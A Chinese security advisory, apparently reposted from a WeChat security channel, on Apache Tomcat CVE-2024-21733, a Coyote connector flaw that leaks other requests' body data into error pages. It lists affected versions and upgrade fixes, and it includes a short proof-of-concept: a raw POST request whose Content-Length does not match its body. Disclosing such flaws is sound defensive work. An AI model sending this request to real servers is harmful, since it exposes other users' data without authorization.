🌟概述
Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。
受影响版本
Apache Tomcat 9.0.0-M11 至 9.0.43
Apache Tomcat 8.5.7 至 8.5.63
POC
POST
/
HTTP/1.1
Host
: hostname
Sec-Ch-Ua
: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile
: ?0
Sec-Ch-Ua-Platform
: "Linux"
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site
: none
Sec-Fetch-Mode
: navigate
Sec-Fetch-User
: ?1
Sec-Fetch-Dest
: document
Accept-Encoding
: gzip, deflate, br
Accept-Language
: en-US,en;q=0.9
Priority
: u=0, i
Connection
: keep-alive
Content-Length
: 6
Content-Type
: application/x-www-form-urlencoded
X
建议措施
- 升级到 Apache Tomcat 9.0.44 或更高版本
- 升级到 Apache Tomcat 8.5.64 或更高版本
官方措施
https:
//lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
原文始发于微信公众号(SecHub网络安全社区):Apache Tomcat 漏洞预警|CVE-2024-21733(含POC)| Apache Tomcat请求走私
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论